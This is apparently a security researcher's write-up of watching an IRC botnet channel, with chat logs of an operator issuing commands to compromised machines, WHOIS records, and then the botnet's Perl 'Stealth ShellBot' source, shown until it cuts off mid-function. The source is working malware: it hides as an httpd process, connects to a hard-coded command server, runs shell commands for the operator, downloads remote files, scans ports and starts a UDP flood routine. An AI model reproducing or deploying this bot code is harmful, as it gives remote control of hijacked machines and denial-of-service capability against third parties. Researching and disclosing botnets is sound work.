15:50 -!- mfu7581 [mfu4864@ADE91361.1404C17B.785B0A34.IP] has quit [Ping timeout: 180 seconds]
15:51 -!- mfu6449 [mfu5855@ADE91361.1404C17B.785B0A34.IP] has quit [Ping timeout: 180 seconds]
15:53 -!- mfu6449 [mfu5855@ADE91361.1404C17B.785B0A34.IP] has joined #bot
15:54 -!- mfu7581 [mfu4864@ADE91361.1404C17B.785B0A34.IP] has joined #bot
19:50 -!- mfu2271 [mfu5789@Clk-7B42562B.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
21:07 -!- mfu4818 [mfu3044@B146388.CDAD79D9.58BDF1E3.IP] has quit [Read error]
21:47 -!- mfu2271 [mfu5789@Clk-9B8960BB.pool.telefonica.de] has joined #bot
--- Day changed Sun Apr 17 2022
01:53 -!- mfu5903 [mfu7600@86591B39.6558B2B3.3E4A66B5.IP] has quit [Ping timeout: 180 seconds]
19:49 -!- mfu2271 [mfu5789@Clk-9B8960BB.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
21:46 -!- mfu2271 [mfu5789@Clk-201225D5.pool.telefonica.de] has joined #bot
--- Day changed Mon Apr 18 2022
01:21 -!- mfu4712 [mfu2492@li1700-46.members.linode.com] has quit [Read error]
01:21 -!- mfu4712 [mfu2492@li2152-35.members.linode.com] has joined #bot
19:48 -!- mfu2271 [mfu5789@Clk-201225D5.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
21:45 -!- mfu2271 [mfu5789@Clk-B8B340A1.pool.telefonica.de] has joined #bot
--- Day changed Tue Apr 19 2022
03:48 -!- mfu4712 [mfu2492@li2152-35.members.linode.com] has quit [Read error]
03:49 -!- mfu4712 [mfu2492@li1700-46.members.linode.com] has joined #bot
03:49 -!- mfu4712 [mfu2492@li1700-46.members.linode.com] has quit [Read error]
03:50 -!- mfu4712 [mfu2492@li2152-35.members.linode.com] has joined #bot
06:28 < Cornel> mfu2277 id
06:28 < mfu2277> uid=1001(admin) gid=100(users) groups=4(adm),6(disk),27(sudo),30(dip),100(users),102(vyattacfg),104(quaggavty)
18:49 -!- Cornel [add@Cornel.org] has quit [Read error]
--- Day changed Fri Apr 22 2022
03:25 -!- Cornel [add@Cornel.org] has joined #bot
07:04 -!- mfu2277 [mfu7062@B0FACE4C.7D94BA8A.21299A17.IP] has quit [Ping timeout: 180 seconds]
08:38 -!- mfu3960 [mfu4261@63C9D263.28292648.D715273D.IP] has joined #bot
08:53 < Cornel> mfu3960 id
08:53 < mfu3960> uid=0(root) gid=0(root) groups=0(root)
12:09 -!- mfu4278 [mfu776@Clk-E6868AF1.zbau.f3netze.de] has joined #bot
12:13 -!- mfu4278 [mfu776@Clk-E6868AF1.zbau.f3netze.de] has quit [Ping timeout: 180 seconds]
14:27 -!- mfu1051 [mfu5865@814B1710.2DC2E949.16053D50.IP] has quit [Ping timeout: 180 seconds]
19:20 -!- mfu6971 [mfu2502@59473E60.CC1C1C70.6415D9DD.IP] has joined #bot
19:25 -!- mfu6971 [mfu2502@59473E60.CC1C1C70.6415D9DD.IP] has quit [Ping timeout: 180 seconds]
19:33 -!- mfu5846 [mfu6497@Clk-77A6107.na.cust.bahnhof.se] has joined #bot
19:35 < Cornel> mfu5846 id
19:36 -!- mfu5846 [mfu6497@Clk-77A6107.na.cust.bahnhof.se] has quit [Ping timeout: 180 seconds]
19:43 -!- mfu2271 [mfu5789@Clk-78D3E5DE.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
21:40 -!- mfu2271 [mfu5789@Clk-91AE34C2.pool.telefonica.de] has joined #bot
--- Day changed Sat Apr 23 2022
01:03 -!- mfu1914 [mfu4036@6778405A.7EFFA6D9.8966812.IP] has joined #bot
01:09 -!- mfu5690 [mfu603@148B05BE.A195C95A.8966812.IP] has joined #bot
04:16 < Cornel> mfu1914 id
04:16 < mfu1914> uid=0(root) gid=0(root) groups=0(root)
04:16 < Cornel> mfu5690 id
04:16 < mfu5690> uid=0(root) gid=0(root) groups=0(root)
08:46 -!- mfu5299 [mfu8693@824CEF1C.6EEB1CBB.E5D32382.IP] has joined #bot
08:57 -!- mfu1689 [mfu5722@4F3FA891.36E68109.E5D32382.IP] has joined #bot
--- Log closed Sat Apr 23 11:25:06 2022
--- Day changed Thu Apr 28 2022
01:40 -!- mfu7581 [mfu4864@ADE91361.1404C17B.785B0A34.IP] has quit [Read error]
05:57 < Cornel> # id
05:57 < mfu2271> uid=1000(backup) gid=1000(backup) groups=1000(backup)
05:57 < mfu8570> uid=0(root) gid=0(root) groups=0(root)
05:57 < mfu1329> uid=0(root) gid=0(root) groups=0(root)
05:57 < mfu1881> uid=1000(stack) gid=1000(stack) groups=1000(stack)
05:57 < mfu4468> uid=1000(user1) gid=1000(user1) groups=1000(user1)
05:57 < mfu5690> uid=0(root) gid=0(root) groups=0(root)
05:57 < mfu7678> uid=1000(cubrid) gid=1000(cubrid) groups=1000(cubrid)
05:57 < mfu797> uid=1000(cubrid) gid=1000(cubrid) groups=1000(cubrid)
05:57 < mfu7500> uid=1002(test) gid=1002(test) groups=1002(test)
05:57 < mfu5874> uid=1002(test) gid=1002(test) groups=1002(test)
05:57 < mfu4597> uid=1002(test) gid=1002(test) groups=1002(test)
05:57 < mfu6821> uid=0(root) gid=0(root) groups=0(root)
05:58 < mfu3960> uid=0(root) gid=0(root) groups=0(root)
--- Log opened Tue May 03 01:41:25 2022
01:41 -!- mfu7454 [mfu1243@##bcable-redacted##] has joined #bot
01:41 [Users #bot]
01:41 [@SuKy ] [ mfu1881] [ mfu4468] [ mfu5690] [ mfu7454] [ mfu797 ]
01:41 [ Cornel ] [ mfu2271] [ mfu4597] [ mfu5874] [ mfu7500] [ mfu8228]
01:41 [ mfu1329] [ mfu3960] [ mfu4712] [ mfu6821] [ mfu7678] [ mfu8570]
01:41 -!- Irssi: #bot: Total of 18 nicks [1 ops, 0 halfops, 0 voices, 17 normal]
01:41 -!- Channel #bot created Fri Jan 28 09:37:00 2022
01:41 -!- Irssi: Join to #bot was synced in 8 secs
05:58 < Cornel> # id
05:58 < mfu2271> uid=1000(backup) gid=1000(backup) groups=1000(backup)
05:58 < mfu8228> uid=1000(user) gid=1000(user) группы=1000(user),4(adm),7(lp),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare)
05:58 < mfu7500> uid=1002(test) gid=1002(test) groups=1002(test)
05:58 < mfu8570> uid=0(root) gid=0(root) groups=0(root)
05:58 < mfu7678> uid=1000(cubrid) gid=1000(cubrid) groups=1000(cubrid)
05:58 < mfu4597> uid=1002(test) gid=1002(test) groups=1002(test)
05:58 < mfu1329> uid=0(root) gid=0(root) groups=0(root)
05:58 < mfu5874> uid=1002(test) gid=1002(test) groups=1002(test)
05:58 < mfu1881> uid=1000(stack) gid=1000(stack) groups=1000(stack)
05:58 < mfu797> uid=1000(cubrid) gid=1000(cubrid) groups=1000(cubrid)
05:58 < mfu4468> uid=1000(user1) gid=1000(user1) groups=1000(user1)
05:58 < mfu5690> uid=0(root) gid=0(root) groups=0(root)
05:58 < mfu6821> uid=0(root) gid=0(root) groups=0(root)
05:58 < mfu3960> uid=0(root) gid=0(root) groups=0(root)
--- Day changed Fri May 20 2022
09:16 < Cornel> #nproc
09:16 < Cornel> # nproc
09:16 < mfu2271> sh: nproc: not found
09:16 < Cornel> # id
09:16 < mfu2271> uid=1000(backup) gid=1000(backup) groups=1000(backup)
09:16 < Cornel> # uname -a
09:16 < mfu2271> FreeBSD freenas.fritz.box 11.2-STABLE FreeBSD 11.2-STABLE #0 r325575+c9231c7d6bd(HEAD): Mon Nov 18 22:46:47 UTC 2019 root@nemesis:/freenas-releng/freenas/_BE/objs/freenas-releng/freenas/_BE/os/sys/FreeNAS.amd64 amd64
--- Day changed Thu Jun 16 2022
01:59 -!- Cornel [add@Cornel.org] has joined #bot
01:59 < Cornel> # id
01:59 < mfu2271> uid=1000(backup) gid=1000(backup) groups=1000(backup)
01:59 < Cornel> # w
01:59 < mfu2271> 8:59AM up 219 days, 14:57, 0 users, load averages: 0.39, 0.50, 0.45
01:59 < mfu2271> USER TTY FROM LOGIN@ IDLE WHAT
16:51 -!- Cornel [add@Cornel.org] has quit [Read error]
14:58 -!- Cornel [add@Cornel.org] has joined #bot
19:22 -!- mfu2271 [mfu5789@Clk-9E004E2.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
21:19 -!- mfu2271 [mfu5789@Clk-F17D233F.pool.telefonica.de] has joined #bot
--- Day changed Tue Jun 21 2022
07:18 -!- mfu4712 [mfu2492@8.208.14.29] has quit [Read error]
07:19 -!- mfu4712 [mfu2492@139.224.15.6] has joined #bot
10:06 < Cornel> # w
10:06 < mfu2271> 5:06PM up 224 days, 23:04, 0 users, load averages: 0.12, 0.27, 0.34
10:06 < mfu2271> USER TTY FROM LOGIN@ IDLE WHAT
10:28 -!- mfu4712 [mfu2492@139.224.15.6] has quit [Read error]
10:29 -!- mfu4712 [mfu2492@139.224.15.6] has joined #bot
19:21 -!- mfu2271 [mfu5789@Clk-F17D233F.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
21:18 -!- mfu2271 [mfu5789@Clk-7BB51117.pool.telefonica.de] has joined #bot
23:08 -!- Cornel [add@Cornel.org] has quit [Ping timeout: 180 seconds]
--- Day changed Thu Jun 23 2022
00:41 -!- mfu4712 [mfu2492@8.208.14.29] has quit [Read error]
00:41 -!- mfu4712 [mfu2492@8.208.14.29] has joined #bot
01:01 -!- mfu4712 [mfu2492@8.208.14.29] has quit [Read error]
01:02 -!- mfu4712 [mfu2492@139.224.15.6] has joined #bot
01:05 -!- Cornel [add@Cornel.org] has joined #bot
01:44 -!- mfu2271 [mfu5789@Clk-B148236A.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
03:03 -!- mfu2546 [mfu889@Clk-455EA91C.link] has joined #bot
03:05 -!- mfu4712 [mfu2492@139.224.15.6] has quit [Ping timeout: 180 seconds]
03:06 -!- mfu4712 [mfu2492@8.208.14.29] has joined #bot
03:08 -!- mfu2546 [mfu889@Clk-455EA91C.link] has quit [Ping timeout: 180 seconds]
03:21 -!- mfu7674 [mfu8867@Clk-F504287A.us-west-1.compute.amazonaws.com] has joined #bot
05:51 -!- Cornel [add@Cornel.org] has quit [Ping timeout: 180 seconds]
09:51 -!- Cornel [add@Cornel.org] has joined #bot
09:51 < Cornel> # w
09:51 < mfu7674> 14:51:34 up 10:37, 0 users, load average: 0.00, 0.00, 0.00
09:51 < mfu7674> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
09:51 < Cornel> # id
09:51 < mfu7674> uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
09:52 < Cornel> # ifconfig
09:52 < mfu7674> sh: ifconfig: command not found
09:52 < Cornel> # uname -a
09:52 < mfu7674> Linux ip-10-0-1-132.us-west-1.compute.internal 5.4.17-2136.308.9.el7uek.x86_64 #2 SMP Mon Jun 13 20:40:51 PDT 2022 x86_64 x86_64 x86_64 GNU/Linux
10:05 -!- mfu6064 [mfu2412@Clk-16680B4E.us-west-1.compute.amazonaws.com] has joined #bot
10:07 -!- mfu510 [mfu6087@Clk-4C039327.us-west-1.compute.amazonaws.com] has joined #bot
--- Day changed Fri Jun 24 2022
--- Day changed Sat Jun 25 2022
14:48 -!- mfu2271 [mfu5789@Clk-7F9E166A.pool.telefonica.de] has joined #bot
--- Log closed Sat Jun 25 14:57:38 2022
--- Log opened Sat Jun 25 14:57:39 2022
14:57 -!- mfu8552 [mfu5210@1E7DF48.EB72E95B.788CBE46.IP] has joined #bot
14:57 [Users #bot]
14:57 [ Cornel ] [ mfu4712] [ mfu6064] [ mfu8552]·
14:57 [ mfu2271] [ mfu510 ] [ mfu7674]·
14:57 -!- Irssi: #bot: Total of 7 nicks [0 ops, 0 halfops, 0 voices, 7 normal]
14:57 -!- Channel #bot created Fri Jan 28 09:37:00 2022
14:57 -!- Irssi: Join to #bot was synced in 7 secs
18:49 -!- mfu2271 [mfu5789@Clk-7F9E166A.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
20:46 -!- mfu2271 [mfu5789@Clk-4B120A22.pool.telefonica.de] has joined #bot
22:28 -!- mfu4712 [mfu2492@139.224.15.6] has quit [Read error]
22:29 -!- mfu4712 [mfu2492@139.224.15.6] has joined #bot
--- Day changed Sun Jun 26 2022
03:15 < Cornel> # id
03:15 < mfu6064> uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
03:15 < mfu7674> uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
03:15 < mfu510> uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
03:15 < mfu2271> uid=1000(backup) gid=1000(backup) groups=1000(backup)
18:48 -!- mfu2271 [mfu5789@Clk-4B120A22.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
20:45 -!- mfu2271 [mfu5789@Clk-12D32431.pool.telefonica.de] has joined #bot
21:21 -!- mfu4712 [mfu2492@139.224.15.6] has quit [Read error]
21:21 -!- mfu4712 [mfu2492@8.208.14.29] has joined #bot
--- Day changed Mon Jun 27 2022
18:26 -!- mfu2271 [mfu5789@Clk-12D32431.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
20:23 -!- mfu2271 [mfu5789@Clk-87981861.pool.telefonica.de] has joined #bot
20:41 -!- Cornel [add@Cornel.org] has quit [Ping timeout: 180 seconds]
--- Day changed Tue Jun 28 2022
05:15 -!- Cornel [add@3C000ED7.A559F2B.991F303F.IP] has joined #bot
05:15 < Cornel> # id
05:15 < mfu510> uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
05:15 < mfu6064> uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
05:15 < mfu7674> uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
05:15 < mfu2271> uid=1000(backup) gid=1000(backup) groups=1000(backup)
07:54 -!- mfu2271 [mfu5789@Clk-87981861.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
09:51 -!- mfu2271 [mfu5789@Clk-5890F8B6.pool.telefonica.de] has joined #bot
18:12 -!- mfu2271 [mfu5789@Clk-5890F8B6.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
20:09 -!- mfu2271 [mfu5789@Clk-F9FF034D.pool.telefonica.de] has joined #bot
--- Day changed Wed Jun 29 2022
07:05 -!- Cornel [add@3C000ED7.A559F2B.991F303F.IP] has quit [Ping timeout: 180 seconds]
Day changed to 13 Jul 2022
02:04 -!- Cornel [add@Cornel.org] has joined #bot
02:04 < Cornel> # id
02:04 < mfu2271> uid=1000(backup) gid=1000(backup) groups=1000(backup)
02:04 < mfu8785> uid=0(root) gid=0(root) groups=0(root)
02:04 < mfu464> uid=0(root) gid=0(root) groups=0(root)
02:07 < Cornel> # id
02:07 < mfu2271> uid=1000(backup) gid=1000(backup) groups=1000(backup)
02:07 < mfu8785> uid=0(root) gid=0(root) groups=0(root)
02:07 < mfu464> uid=0(root) gid=0(root) groups=0(root)
03:52 -!- Cornel [add@Cornel.org] has quit [Read error]
Well, Ultimately as can be shown here, nothing really came out of this botnet since it's kind of a hard infection vector. Most of the remaining “users” are more than likely other security researchers (mfu4712 is clearly a linode instance that keeps changing, I switched my identity as well to a linode instance). The only remaining compromised node seems to be mfu2271:
Day changed to 19 Aug 2022
03:22 -!- mfu4712 [mfu2492@117.74.65.223] has quit [Read error]
03:23 -!- mfu4712 [mfu2492@117.74.65.223] has joined #bot
04:29 -!- mfu4712 [mfu2492@117.74.65.223] has quit [Read error]
04:30 -!- mfu4712 [mfu2492@117.74.65.207] has joined #bot
06:45 -!- mfu4712 [mfu2492@117.74.65.207] has quit [Read error]
06:45 -!- mfu4712 [mfu2492@23-239-19-159.ip.linodeusercontent.com] has joined #bot
06:47 -!- mfu4712 [mfu2492@23-239-19-159.ip.linodeusercontent.com] has quit [Read error]
06:48 -!- mfu4712 [mfu2492@117.74.65.207] has joined #bot
16:02 [Users #bot]
16:02 [ mfu1029] [ mfu2271] [ mfu4712]
16:02 -!- Irssi: #bot: Total of 3 nicks [0 ops, 0 halfops, 0 voices, 3 normal]
16:06 -!- mfu4712 [mfu2492@117.74.65.207] has quit [Read error]
16:06 -!- mfu4712 [mfu2492@23-239-19-159.ip.linodeusercontent.com] has joined #bot
16:06 -!- mfu2271 [mfu5789@Clk-13DF96D.pool.telefonica.de]
16:06 -!- ircname : mfu7793
16:06 -!- channels : #bot
16:06 -!- server : irc.Cornel.org [Cornel Server]
16:06 -!- idle : 0 days 19 hours 56 mins 53 secs [signon: Thu Aug 18 20:11:28 2022]
16:06 -!- End of WHOIS
I see no reason to continue squatting, so I'm just leaving. No exploits are being run and it's getting tedious to track this for very few bots compromised. Much better to publish and have someone knock it offline, and move on to more productive research.
For the remaining bot, the IP addresses with non-IRC WHOIS protocol give:
inetnum: 117.74.64.0 - 117.74.79.255
netname: baolirongtong
descr: Poly facility (Beijing) Technology Co., Ltd.
country: CN
admin-c: JX1666-AP
tech-c: JX1666-AP
abuse-c: AC1601-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
last-modified: 2021-06-16T01:30:52Z
source: APNIC
irt: IRT-CNNIC-CN
address: Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox: ipas@cnnic.cn
admin-c: IP50-AP
tech-c: IP50-AP
auth: # Filtered
remarks: Please note that CNNIC is not an ISP and is not
remarks: empowered to investigate complaints of network abuse.
remarks: Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
last-modified: 2021-06-16T01:39:57Z
source: APNIC
One last set of IRC “/whois” for “#xyz” users:
16:16 -!- dark4609 [dark507@Clk-16A21240.in-addr.btopenworld.com]
16:16 -!- ircname : dark6441
16:16 -!- channels : #xyz
16:16 -!- server : irc.Cornel.org [Cornel Server]
16:16 -!- idle : 14 days 20 hours 32 mins 58 secs [signon: Thu Aug 4 19:44:58 2022]
16:16 -!- End of WHOIS
16:16 -!- dark5090 [dark2899@6E024D62.9D096B3C.89993606.IP]
16:16 -!- ircname : dark5702
16:16 -!- channels : #xyz
16:16 -!- server : irc.Cornel.org [Cornel Server]
16:16 -!- idle : 130 days 2 hours 9 mins 37 secs [signon: Mon Apr 11 14:08:26 2022]
16:16 -!- End of WHOIS
16:16 -!- dark6855 [dark7956@Clk-13DF96D.pool.telefonica.de]
16:16 -!- ircname : dark3592
16:16 -!- channels : #xyz
16:16 -!- server : irc.Cornel.org [Cornel Server]
16:16 -!- idle : 0 days 20 hours 6 mins 17 secs [signon: Thu Aug 18 20:11:51 2022]
16:16 -!- End of WHOIS
#!/usr/bin/perl
# - Adicionado comando !estatisticas ;
# - Alterado o comando @pacota para @oldpack;
# - Adicionado dois novos pacotadores: @udp e @udpfaixa ;
# - Adicionado um novo portscan -> @fullportscan ;
# - Adicionado comando @conback com suporte para Windows/Unix :D;
# - Adicionado comando: !sair para finalizar o bot;
# - Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio;
# - Adicionado comando !entra e !sai ;
# - Adicionado comando @download ;
# - Adicionado comando !pacotes para ativar/desativar pacotes :);
########## CONFIGURACAO ############
my $processo = '/usr/local/apache/bin/httpd -DSSL';
$servidor='5.161.51.216' unless $servidor;
my $porta='6667';
my @canais=("#bot");
my @adms=("Cornel");
my @auth=("*!*@*");
# Anti Flood ( 6/3 Recomendado )
my $linas_max=6;
my $sleep=3;
my $nick = getnick();
my $ircname = getnick();
my $realname = getnick();
my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "#";
my $estatisticas = 0;
my $pacotes = 1;
####################################
my $VERSAO = '0.2a';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0";
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
#####################
# Stealth Shellbot #
#####################
sub getnick {
#my $retornonick = &_get("http://websurvey.burstmedia.com/names.txt");
#return $retornonick;
return "mfu".int(rand(9000));
}
sub getident {
my $retornoident = &_get("http://www.minpop.com/sk12pack/idents.php");
my $identchance = int(rand(1000));
if ($identchance > 30) {
return $nick;
} else {
return $retornoident;
}
return $retornoident;
}
sub getname {
my $retornoname = &_get("http://www.minpop.com/sk12pack/names.php");
return $retornoname;
}
# IDENT TEMPORARIA - Pegar ident da url ta bugando o_o
sub getident2 {
my $length=shift;
$length = 3 if ($length < 3);
my @chars=('a'..'z','A'..'Z','1'..'9');
foreach (1..$length)
{
$randomstring.=$chars[rand @chars];
}
return $randomstring;
}
sub getstore ($$)
{
my $url = shift;
my $file = shift;
$http_stream_out = 1;
open(GET_OUTFILE, "> $file");
%http_loop_check = ();
_get($url);
close GET_OUTFILE;
return $main::http_get_result;
}
sub _get
{
my $url = shift;
my $proxy = "";
grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
my $host = $1;
my $port = $2 || 80;
my $path = $3;
$path = "/" unless defined($path);
return _trivial_http_get($host, $port, $path);
} elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
my $host = $1;
my $port = $2;
my $path = $url;
return _trivial_http_get($host, $port, $path);
} else {
return undef;
}
}
sub _trivial_http_get
{
my($host, $port, $path) = @_;
my($AGENT, $VERSION, $p);
#print "HOST=$host, PORT=$port, PATH=$path\n";
$AGENT = "get-minimal";
$VERSION = "20000118";
$path =~ s/ /%20/g;
require IO::Socket;
local($^W) = 0;
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Timeout => 60) || return;
$sock->autoflush;
my $netloc = $host;
$netloc .= ":$port" if $port != 80;
my $request = "GET $path HTTP/1.0\015\012"
. "Host: $netloc\015\012"
. "User-Agent: $AGENT/$VERSION/u\015\012";
$request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
$request .= "\015\012";
print $sock $request;
my $buf = "";
my $n;
my $b1 = "";
while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
if ($b1 eq "") { # first block?
$b1 = $buf; # Save this for errorcode parsing
$buf =~ s/.+?\015?\012\015?\012//s; # zap header
}
if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
}
return undef unless defined($n);
$main::http_get_result = 200;
if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
$main::http_get_result = $1;
# print "CODE=$main::http_get_result\n$b1\n";
if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/
) {
# redirect
my $url = $1;
return undef if $http_loop_check{$url}++;
return _get($url);
}
return undef unless $main::http_get_result =~ /^2/;
}
return $buf;
}
#############################
# B0tchZ na veia ehehe :P #
#############################
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 2;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0.6);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001gtfo\001");
}
elsif ($args =~ /^\001PING\s+(\d+)\001$/) {
notice("$pn", "\001BONG\001");
}
elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
elsif ($args =~ /^(\Q$meunick\E|\Q$prefixo\E)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "$prefixo" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
$meunick = getnick();
nick("$meunick");
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
}
}
elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
getstore("$1", "$2");
sendraw($IRC_cur_socket, "PRIVMSG $printl :Download de $2 ($1) Conclu.do!") if ($estatisticas);
}
elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) {
my $hostname="$1";
my $portainicial = "$2";
my $portafinal = "$3";
my (@abertas, %porta_banner);
foreach my $porta ($portainicial..$portafinal)
{
my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($estatisticas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Porta $porta aberta em $hostname");
}
}
}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @abertas");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
}
}
# Duas Vers.es simplificada do meu Tr0x ;D
elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta = "$2";
my $tempo = "$3";
my $pacote;
my $pacotese;
my $fim = time + $tempo;
my $pacota = 1;
